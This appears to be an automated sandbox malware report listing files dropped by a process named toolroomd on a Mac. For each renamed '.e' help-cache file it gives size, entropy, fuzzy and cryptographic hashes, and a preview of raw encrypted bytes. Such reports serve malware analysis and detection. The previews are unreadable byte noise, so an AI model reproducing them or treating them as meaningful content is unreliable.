Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.#=...#U....0?,..5.4.... .....D.V.J....7..(.....UN.#..i?r...+`.ds..D. ..C._.-.Z..].....>s.{...u..N4.w.o..x.@.9.g.[),u..(G.h...E..f...,,Y&.&..Q..J$.wZVW,..y..!,/.a./.....2..A.@!,....{.j=/.2`V.uG.a.._..^g...=.K...u.7...............+...D...YH..5.3....E./[.!.........v..O.....#....Ov....S .!"...T.;.x.W,B....q=.f1..P.........q..\n..x....}..?.T..hm...t..M...${..p..,9...."....M..{.....eu%...h.FF......].T^..$..~.....Y.........T>..!..!.....h..u.^N...<..<m....u..N4............j..4~`..T.pj_%s..{..p..,9.....A....M..{...9...>3...........:.h .P6t(e..\..V.."J.!.:...M..l......W.MR..AFz....U..>s.{...u..N4.w.o..x...g-.d...8]..T..NC....u.9.8..w..<@n..-..J$.wZVW.d.X.h../.a./.....2..A.@!,....{.j=/.2`V..T.KTB..@.$......;8e..o.{.#../@...:.<...=.....g...}l..N-o..../[.!.........v..O.....f'........,......L.!.oq. %........1.._.P.........:&;[-.\.{.cY....]..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.TextEdit.help1.13/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	59677
Entropy (8bit):	7.694285150774478
Encrypted:	false
SSDEEP:	1536:GpNKgcfspFm7gS9z9+Hx1UFQXWckwx9qg:GpIxeUMSAiwx9qg
MD5:	E348CC22884CDA5AF8BDB9C0E5DD37C2
SHA1:	1AF2644A92662437A281772664693F41622B5D9C
SHA-256:	72239763831B7EEE022F5AB27A5F74CC1AF72C070D097EEBADC6F537BA1D78A0
SHA-512:	67177245B5F5E5813FE2753E95396936032FDC2B5FFF25C80EF46360655A373D970AB8CE268205AA56886FF45C8E59727070B2A08DD3B8B5E8BCB9B497B6FD7F
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...7Z...H...w....o:Ew3.7v.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.n:...d...%..3.u.>.mX.;...lS*...q$.4EV.B....h...#.....v..O.....)....#....c3\54.........E..\ ...{..p..,9r........M..{.._..{..J....J..p.......t..Ke.....:.u...9...r.~R.6..M..2...x.C.R=l<...u.../....<c>.e..M....I..1!.@7..... Z...P?.P.....^..p...r%....H..['.&a..u.>.mX.;.....0.>UXh2...0...h...#.....v..O......-&....(._.&..Y...3......?>.u.^N...<..>s.{...u..N4..`.=JV.....}.d>.mX.;....._..\|.G.....M...h...#.....v..O........xW.Pxa1...N..a#8........._a.kc.#A.\|t.....S!......,.....c.;.-.I.N......F.op....."i.T\.v./.a./.....2..A.@!,....{.j=/.2`V..t.....J.<.#-..~.ht.Z...D.....u{..p..,9.n..Dr..M..{.._..{..J..%^..iD...v.[.j=P......e...RVw...5.RK..6..M..2...x.C.R.'T.~V.o../1....a#8.....8.L.kc.#A.\|t.....S!......,.....c.;.T~.b+].xV.ty.d7$..../A.v. .../.a./.....2..A.@!,....{.j=/.2`V.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.airport.airportutility.help6.3.8/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	69582
Entropy (8bit):	7.75516462425684
Encrypted:	false
SSDEEP:	768:GDO7subKweMmjSPKTL52Z4PTpR1i2+rxSb2MiFxOTpJItNdPemH2WiKctXxMO9h8:GGFOwbPB2CtSJbCz5fsN/VUVCyjJO1a
MD5:	BBFB5C5F8674B754B6BCF233E193D82F
SHA1:	0BCC048D5DA4254C7A196FD6F5D443A228D553A8
SHA-256:	027A19A0AA8D83538F232632829C91918AA94E594FDA8F149D935F1B1FE113AB
SHA-512:	580737E6EFA1B4F885E636CB0F08375911FABB3C3B81EB956ABDFD26F88722C52B619D348409B60C019C5BAA4806A042BA553C3DD50414B869AF827786CDE152
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.....=.SC....g.u....yvWJ..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{.....eu%........?.f.6........e.9.....\|-H..h...#.....v..O......+...V..j....eD.q)..r.d..-..OZ.)#n..H>_.z....dh...<..!.;*...D..OY.i.c..9....D.g".R..;[..7.j..P.....^..p...r%...2...uc....+.m.4....kc.#A.\|tO..8{.......,.....c.;..4.....^...2..^...@`...#...`....r.~R.6..M..2...x.C.R6lh_.zr.....E..4.....N...b../.>...m#.y....>s.{...u..N4..Z.U~.76F.J..S....^.!...Hc'<./.a./.....2..A.@!,....{..........M.A...7..A.}L_.(Cn.s.3....E....._......v..O.....q...14T@.^...2.......@...].].{.!...r.~R.6..M..2...x.C.R.2...f...-.... .....N..S?...]...m#.y....>s.{...u..N4.3..b.I..Tt[.....0.g..Q.....~-./.a./.....2..A.@!,....{.;%-s...y.~..!..e[.C...xt..B..O.m.D..4p.4{..p..,9.n..Dr..M..{.....eu%.O..4\X.........B....g.u...0..g..X..@Y.......v..O.....aw.N4....z...!...x$).-s.kc.#A.\|tO..8{.......,.....c.;.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iCal.help10.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	87911
Entropy (8bit):	7.85371171770422
Encrypted:	false
SSDEEP:	1536:GFXU9Uf9mA0hM73jO+YWh3pYqxkYdCCHoTwQYek6UkgQG56:GFXU9UVmA0E3S+J+qxkY9HarK0
MD5:	AA699783CB4457ECB31EF31220D207F2
SHA1:	628D2958457AD3162ACF4CA9C028495C43CCB90C
SHA-256:	6B6B777262E4F2E886F232C815B1599B0A0F4FAF9DB216CBEB17A48833975499
SHA-512:	B658D36225A72B72F6EA68D3E031B6E032A10130FC1E6B587EE42D472DCDE23E6226DFA05D786797269E97C951CC4588DAF305D8379ADBB6B5D53AC98CEA3748
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...$.9.B/dj1..c ..q:....TJ.k.S.U.4.......v^.;....7...vP...Z...M..{..+9w...f...Bi......xk..!U..\...oP......z....dh...<..!....}...1....gq~AD.}.C..$.4EV.B....._......v..O.....@.kZ.%.@.6..t..J.c8Q...E-n.u^\i..f.z.6..M..2...x.C.RHoFd........Vw.D.vz......h.......m#.y....>s.{...u..N4.A.....m6...7..s..->.G...S.f.[..7.j..P.....^..p...r%...=m...........9.=..H.jDy}..s....G.z....dh...<..!.X.b.Qu.v.m-..U.....;[?D.>...G..B/.a./....A-..W.!,....{......q.".^.(Uqw....\|.WR.}.."..{..p..,9P...Z...M..{..+9w...f...NY.>...xk..!...9. .&oP......z....dh...<..!....}...1.b.....#G#zIT.......\|-H....._......v..O.....K/...n....;[?D...B..R./.a./....A-..W.!,....{......q."..B..R.T`$J[.k.2.A.y....=.....) Z...P?..........p...r%....NP........K..q.$..F.W.7ZE .....\|-H..h...#.....v..O.......w;....z..".F?..k..(.o.`=.....>.r...96..M..2...x.C.RK.Ge......v.[.j=.#`4..`.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iChat.help11.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	72926
Entropy (8bit):	7.849937410067487
Encrypted:	false
SSDEEP:	1536:GjfJVYSWV1yiWWG0PL6pMn4XWB2HPcmCy5U/0Ab0HAhzfL3:GPYSBdT0PL6GneWUPcmnW/0o0ghP
MD5:	E7E8D1308EE822BA8012F6D8893B59D2
SHA1:	A3F86B6E90D3E7A6942062FEBFF74264E1D667DD
SHA-256:	3C99A04C0B825588A0DA5ACE51BBA00BF5BB822ADFFCEB3373DA928502532443
SHA-512:	3A15C7C36E093C831609CA50201F7E57837DA61D235BAA00EB14EE2BBB1B1DD8F4FD9D94071410B37571F448B0C83967EE8889555E577C2B147C7ABAEEAB71CE
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:...N..EB..N..Nr..6.n....J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%.wai....w@.........E.....e...;j...F.%._..>s.{...u..N4[. .6...W...H....2XQ.w^Qx..Y.@.)#n..H>_.z....dh...<..!....u.....W..>...!...P.. d(.....m,;..W.6..M..2...x.C.R.eY.....5...Ryaz}.X..}.o.`=.....B..z.R.6..M..2...x.C.R..~.v>..s"mxL....8..i...k.u=6/.a./.....2..A.@!,....{......q."...N.Q.K.ze)~J...e....._..oqx.......u..P.....^..p...r%..8...u../.M.....$x..N..$.4EV.B..X..@Y.......v....R.(...i..u.Z.Rc.........f.I..I...J%....:..+.....v..O.....d../.@...LG.....\O...x...N-o.....X..@Y.......v..O.......r5`%Q.E.V....W..zLi..N-o.......:..+.....v..O.....S;...`\......d.[....R.k.Q.X.*..1..\|.b.P.....^..p...r%...jl..a7L.. ....e....._&.....T....u..P.....^..p...r%..8...u...'..n.H....yO.0.5.?.N....ilBI..>s.{...u..N4[. .6..........\c....+.m.0H.R.L.kc.#A.\|tO..8{.......,.....c.;..0H.R.L.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.iTunes.help12.8.2/.en.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	187501
Entropy (8bit):	7.9313158667091175
Encrypted:	false
SSDEEP:	3072:GpnOQUitRJB+7dl/+iZToci8Caj3JU/8Y37V4P9x9gf4gnklENBkSuduwOyK7lut:FQUitRJB6dlWiZToci8Caj3JU/8Y6D2Q
MD5:	F4CE88866425BC90BA8E133AF69A6A45
SHA1:	82673C3DD624AF28E6638914AF83A5C174E35ED6
SHA-256:	260E0BEB8CDA11265E364C4295051EB6E67BCD1F574D8C217ADC65BF548633BC
SHA-512:	632C5618C09A05E0B845A21C169E033D08DC43ACC6C028BDD3D642F8D7AB2412F48EFAAA9F46FEA1BDF47BFF7EAA527C6F3FA92C0B1E3BB02607BD6DE485AC04
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.z..aX.+.Ug.....i..Amv..TJ.k.S.U.4.......v^.;....7...vP...Z...M..{...n\|M..%6..9.`..;v..#.[.d[..^sq(kc.#A.\|tMe.j~........,.....c.;.:..p....p../.....^.....h.5..."#.....u..P.....^..p...r%......D......0...G..7..s..\$#7....ilBI..>s.{...u..N4.>dm....~_...ch...f..T...K!....kc.#A.\|tO..8{.......,.....c.;...K!.....6..t...iLA.,.7..3w.+l...r.~R.6..M..2...x.C.R......SpgwK..r5..\|..?.[.~.<....[F.. Z...P?.P.....^..p...r%.W.P.....W....& ....4..9.3..{.N.]9..g.p....C.A.....v..O......$........y....t.%.......X)#n..H>_.z....dh...<..!.....i?X.:..*........C....J.P;..m,;..W.6..M..2...x.C.RJa..:..5.@.op.SF)..F.Y]0.Ab.E.{..p..,9.n..Dr..M..{...n\|M..%6.Q..!^~.....m...Z.p.U....}....X..@Y.......v..O.....f....n..."e...n....Fi+.p..(Y.....:..+.....v..O.....9...W%.T.ae.>....Z.p.U$.4EV.B..X..@Y.......v..O......KC.&...f..T.l......kc.#A.\|tO..8{.......,.

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.machelp10.13.2/.en_US.exactmatch.plist.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3426
Entropy (8bit):	7.72069630442758
Encrypted:	false
SSDEEP:	48:yjzBWLNOXJnTXyTMmYTWd8vI/nJIf8aMilmaq2wtftqYuSezfDBQJaNpq:yjiwJsMmYTLghIWVagKfdQ8u
MD5:	80FD1325C8FAC69D05C53E31E8987BB0
SHA1:	A3B8B7CCFE85D62610B6BF82DC9BF613B7B0EBEF
SHA-256:	67D5350E8927C2640A3A20C5703277174B8F1EB01044227B1E62D3002FC8E367
SHA-512:	ED789FD3386DB9FDDB91EC0E19BDF709D8C37C5D8D68FF4EA929A8DF73FA274F6B913FDA1A97146C8069A9D607C25C26B8A8FDB2F2F8DCEE58B2C33BFA50D590
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~CL}.b$&......O\......2..}...u.tu.m.6..=.p!..G...nI.R...{~......v.6'.T.._U..i...<.q..(..SJ3;ne.~1.....8.Q...J......H..(.oL(....I).p7.Q\|.I.,&...HYD..?\..]....,.4....!4...s432..^H.!.^v...U..8...,p.bQ....2..}..3....v.D..Pf..9..p.&...{...:.~.....F.....A.)..% ....pL.M]..WF.8...G.J............h'k...Hz#.u7.2.+.W..S..._U..i...<.q..(..]D.....~1.........Z.......H..(.oL(.:....]..Q\|.I.,&...HYD..?\..]....,.4....d.....s432..}:d.eO........pL.M]..WF.8....h&...>!....~KpGO..z#.u7.2.......4I:.Gzo?.v.7.x...W....->.:....:.\p.m.I.A.....c.e!y.y.mf....g.B.e...1~.p.ke..PY...FV...{+.&..U.....J..._.{.....N...._U..i...<.q..(`........~1......P..+<.......H..(.oL(..D..v;.zL..P..C.pL.M]..WF.8..:......q.Av./.-O/.d....z#.u7.2.@.pR$....Y....tK.1./....}.'.........d..9.....}...QK......k...z._..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.machelp10.13.2/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	913817
Entropy (8bit):	7.972947511416363
Encrypted:	false
SSDEEP:	24576:PrdLfsMDphQf6dMCRg8qU58+tb3+dtLe0kPru0rTlZ7IVfw8ODl:zIx4WEpTH6A
MD5:	5BAE5D8A29829E19B6FAFE578657A92D
SHA1:	AF0A12797D3EAAA913E5B33D38BEEBD9F7F62D43
SHA-256:	9DAB2CE49D07E742B70B22C79DF221B3E0EC7ECA7503A0B927482224D04B17F9
SHA-512:	46EC0F38736BD10EEE3B668ACB9F56D872E4DA6C6C118E00DE090F1680450D8D77DBF56B02E6E9E0D7692CF7081563E36B1015B127023C4ED3727AB9FD0C27A7
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.a....5..-.I.....I.Y......j.k.P./.I....CJ.aF}A.s.!..,.g(Z.V.!,....{..5p..O..M......}._f.j...L.Y.N.&{..p..,9.....A....M..{..../....9.$...6.......9.n^}.&EJe..m#.y....>s.{...u..N4..}O.r.....:-vh(..%nd<....O*.K..)..g..P.....^..p...r%....E..D.-.S..$w<.._...G...0..g....:..+.....v..O.......?.O/...3B.M..?...@n...oqx....1..\|.b.P.....^..p...r%..."Wqsq..H}.j....].5.jT.$.4EV.B....._......v..O......XR....=.s...3/.G.P..lkc.#A.\|t.2..........,.....c.;.&..C.....Co.%...!.MW...S.%.m\|m%...s....G.z....dh...<..!..#.'t...V...sh.?.&eo5..7,Ne..>..{..p..,9]Y.z.r...M..{..OM...\z...c.P..y..B.(Q..W;~Jg..)#n..H>_.z....dh...<..!.<.c....R5..u..=0...g...0B2?2&Q[..7.j..P.....^..p...r%......p.<-?.....uD{i.Z......}......:..+"v}O.:~n.O......g]v..{....g`.f........kc.#A.\|t.s.L..br.....,.....c.;.+;r...3-....}..........kc.#A.\|t$k.R...0.....,.....c.;...z...?o.....[......jT.p..(Y..

*/Users/berri/Library/Caches/com.apple.helpd/Generated/com.apple.reminders.help5.0/.en_US.helpindex.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	37524
Entropy (8bit):	7.597510039373467
Encrypted:	false
SSDEEP:	768:GlI3Hf2JgPunQqShXacLXc/mSUtCzyZOn2usUy0SS4n:GluHuhnQqShXays+S6vDUyq4n
MD5:	9F98C9EA46728E6DBC4EEC4E3CC887A3
SHA1:	CD266C68A1646391C37E4E93083C1F2A3E1839CD
SHA-256:	3A5AC725651BAF8DDF514769DDCE83A825D2A0A2C93A37BE04DCC00D74C19920
SHA-512:	565E223D6B65955CF5A294B1DE2617072ED963E2FCDDE5E0BD6ADFA4F6D8EED51C240A91BF26F983E0265C6C37029903FF0808A8B4BEE66D851DD3D6696117CD
Malicious:	false
Preview:	..D5.Wg..U...1.O._.....TJ.k.S.C.gj8....n...-C.gj8..}.9.G(:;.z..)DR...._.#<+Q....?...eY../......U..i.'.5:.,.qH....j....h..i...S.J.+X.F.J.:wCQ....+.F\|p..aR.[. Z...P?.P.....^..p...r%...b......../..).n.x.fk.....i...G.....M...h...#.....v..O.....;..Gc......."-....x....5l...J..kc.#A.\|t.....S!......,.....c.;....P....}!...V.LR`..\.@........./.a./.....2..A.@!,....{...+...pxI.rI..vZ..5.a....?"..X....9d.{..p..,9.n..Dr..M..{..N.........%.8_.LG....._....yC.....\|/c....ilBI..>s.{...u..N4..+.&.-.....i...I..mYq.,....J?.].....s....G.z....dh...<..!...6..5.I."e..i...J&...l<(...k....;\.:.c....r.~R.6..M..2...x.C.R....1...K.vpN.s.6.....h..:....g".R..; Z...P?.P.....^..p...r%...;{.?.U.......n.x.fk..,.........R........h...#.....v..O........c.i.?..;C..q...x....&..6)..kc.#A.\|t.....S!......,.....c.;.....y.{%.....x...../9.{...H. ......*,....j.k..Y3."...s]...%..zXL.~..+.i&..:y..'0.4........p..3R...z.M4..g3SX.!.`...q.A"&...q.A"&/.<.8.....D.]....h'...vM..j..<.V.J...

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-shm.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	33091
Entropy (8bit):	3.5675398639983866
Encrypted:	false
SSDEEP:	24:VA7c+0w6TgpeoPk80000000000000000000000000N0000000000000000000000:I6QPXd7d56WkxqZkYNpq
MD5:	35C78A740D379425DB55903A59BF19D9
SHA1:	F1A9F562802F83B79DB3583231B4EC4A44369CD6
SHA-256:	6AD552D34898A1B97A5BB2EC51AD69A4A8F16592AB071A8E829E65610391011E
SHA-512:	8141CDD18F88E2133CDF1C16E643EBCA287A30B40A766F3F42C93EDBA0D02FA9E9A1B428DF4AB6F0497000E8AA9E6EF4A25013504D0BB398FDF0A947303D1238
Malicious:	false
Preview:	f...#D......X...._v..n.....M.u.....Q..K........f...#D......X...._v..n..h..V)..5...Q..K........6<.."a....D.[.....q.A"&6<.."a..6<.."a..6....ZS6....ZSV...Y._1..0....N6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS1Ga...$.6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZS6....ZSt..`0QlR6....ZS6....ZS^UN ...:..s.>....xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL.1Ga...$...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL...xRLL../.&u....Q.%..^UN ...:.>..K..1Ga...$.In....V..q.R.i..4..#.x..W.t.'T.66.......D..[..}..S.WS.....Jn7.6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes-wal.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	511505
Entropy (8bit):	6.382383871990842
Encrypted:	false
SSDEEP:	6144:tm4PAF7dwe64geALzVsLkDoItLp4AjbQy2C5WXd3d:9W3
MD5:	D492E8FA591887966A90B1281E526D97
SHA1:	60D3A3044C0BE3D793470DACE967B4ABB927EF19
SHA-256:	4D90A6A6C539FAC07817E321572C619C647DE55A5F4B773B40673D3D64A2B777
SHA-512:	F62DC4A2A17A6B8E1AC9064E190F3CC7109F765338ED6CC83AEB2BC64EA277C80ED318AA6A71685B69610FB50336FD4C834768D5A391BB09A440980FE49D4B66
Malicious:	false
Preview:	^u..o.F..3...6.....Q..K.Uq..{\.!..........Q..K.z.l3.w"...@....>T..Y-..Up#....r.Y..ihh..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....*Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.fileAttributes.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	86375
Entropy (8bit):	7.054335098784275
Encrypted:	false
SSDEEP:	1536:jbxToMmnqoMmnjD13PgpZYN+XTbonhJCAlatULP/nwGw+P:ppmimRYpZYN+XTbonhDlatULHnwGRP
MD5:	8DBD2DFD3FBFCED991B1795A4B7D6263
SHA1:	317E99A04D616398294AA0009A616AC48ED99064
SHA-256:	6F220E8DF2044F9DFF6A8E768F4AF86F2E624FD5C2D83E6B79F8CEA011A989F3
SHA-512:	3AF41531CA62B8F5B670C9A735D98A8711161021EE1515E064C974DA239B2208576AE9027D36BEAE712FBD98411D30F7E21AD6180CFBDD33715766EAEEE29812
Malicious:	false
Preview:	..d.=..._t.........X...6....4.6<.."a.......\|.E..S......7...x..7...xt....Sq6<.."a....IeG[...^.#$:.N....k.1."....2\6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/.suggestions.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	316693
Entropy (8bit):	7.998343287044924
Encrypted:	true
SSDEEP:	6144:6AJepEqSsvKA/CrCoGJTE5qD73hh2PZ24cjGFT77bMbWooYJMiq5/To6xpuTng:61KZsSA/WC/I5qDLj0T7/MeYJkVb0k
MD5:	EA34C5BB7EC61701DAC1306BB8787B65
SHA1:	B23DD03ACE7C6F8000CF8BB80A47E18F70913464
SHA-256:	7CCEC5F0FB3942DB1087670A5C22120EC690926E6DCFDC1B58102D525D6AE401
SHA-512:	E59EF1C606D77FD0E64802F96CDECED8FC13C48C61DBD53730E494D9F689F6589F350E967FA06EF286DC54D9BF084D6948848E4980A791A24AEAF7331357E38D
Malicious:	false
Preview:	...a>k..O .....\|...1....{..{}...n.=...v....!...)...}..t.Vu.y!.K.)[.<A9.Y...[......z\|.J.......`.b(.)..0......!..Be.;r.a...zY.n..jI...\|.=....'.L/bW8.+.)......a4....<.\.FRg+.N.U..@O..o.H...v.C.......\|.......\|..o.L+/...1.N.hGi.....?4._.T..........~~z...5..#/..k..v.C.../..E...?...M...S...9k7..........,...&,......D..OL ........./..=.t[r..v...6...']...Q.i....r&6.7..y..3....K..\|Va..H.Jz1.b.r+..J..6...W"..k...O.u0..&..Rv.....7gR<.=9.F...P/..tQq.#..#.<...T.7.........H\|Va..H.J....6+..._..KR<.....k.M..!.j_kn.g.....E.W..c...U........\|.-..o,....h..~.p#U..k.I......#j`....L...VU....0....X......a.I1.(..dli..S>V..(8]...Q..}...43....q[).....d.\|Va..H.J.l..X.R.?...M......r.:i..\|Qm.V....C.w..U.it6.s..._.....K.J....w.:../.!*.S(v......X.....O.u0..&.J'-4.,.B.)..... ^...)N.).I,..+A..=...q+:B./...._2T.?0....#N7X...2......W...4.I...M..yV.B....A...I."..y^j...4.J.W..v.C.../..{....V&I.....v..c.R.Wh.t3....7.#.l0......e.0....G......6.Y...@....!].u.':K.....$`.U.'......

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.ActivityMonitor.help10.13.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	7554
Entropy (8bit):	7.9400680878704115
Encrypted:	false
SSDEEP:	192:LwguL7mdGy6tN4Kyq1bobw0014QtgUZWWye0CB6e:mL7XyMNPyqibwjZtjN55BB
MD5:	DD4D11D6414C4E174FE06B67D010E9EF
SHA1:	8A20828830EE0A4474B4489DFEEF469ED37D72A8
SHA-256:	AB38DCECE1CF3BD577E795DED1C5C1572F104B0DF9E90876ED4AF0110B68480B
SHA-512:	70D1853E77F1D0D2129846B6DE94AF3318405F07CFE7B560AD9A17F756BAE2328098D42F651973DF016E0A65D5686468A5359F63FE543DF3ABB27CA0C884854A
Malicious:	false
Preview:	..D5.Wg..U...1.+....n...T...Xg...".rDo......9....D.WaD.E...t...FG.m....9p.0..X.......:8.%...YKs.......)A.....\|...syc...P....,..19&...8...n.@...u...G.!..^..).o.e.....fW\......;G....l.+..._0M}.]...LEpF6]G.h..x..A.@..\!.ml.;_p........$sT8=V!._..7..r.O..k^.F.ll."1.d~...]...F..E....V....k..X..W.Hhf..d<d..px..&.Z.H..F.R.>..?..X.S.^.BvSMb%0htfK... !...U....-_..^.....".a...B...xU........Op8=..)b..V.`......L..o.>...M..d6<.."a.....!..82.q]Kt..g.....8........`B+u.."..Q....O....7.?w$.1.#a%.9H..C.(.y...U..8......+.C...).......\..#.f...cIq..Y.T..o......"..WB)&.:..;.EM.z..e..].P.}WE.%....\|..8Q"....$lH.1..tU..YB.h..,N........jFTb.F...-..]..C[m.......S...VqQ..2...4.3............x.H.#...t..!$...;..~eP~.2.........r.R.Y??.....D...'..T..u.Z ..5.:o....3..qcu.A.T...,^...M...I._S.r-%.8K1,0-H...#q.../w.d..z.......B...$L...l..K6,#..-w.h.X_w.k~Z...VJ.<...Qk.(..M.9/..Szt..H[bR...........rzq.fkn..v3..Pa...."]W.x...p.....1.../..4.S.p.c.....I..L.;..\.<..OH........

*/Users/berri/Library/Caches/com.apple.helpd/SDMHelpData/AppleExtra/English/HelpSDMIndexFile/.com.apple.AddressBook.help11.0.e** Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	15090
Entropy (8bit):	7.9777894694770275
Encrypted:	false
SSDEEP:	384:EayXNOBFYJCWthdnP3ez0v+sXo403tITSuZ:7BFYJCWBf80JCOTSC
MD5:	D5317176B1AA6B8336A1DDF47AAC36C1
SHA1:	13A86380BAF63E148F66C695AEEE9BB008977871
SHA-256:	F90634D4872D21BFAD7D291E57004F27FE163FF5645CDCA6B48D9282DBF2423B
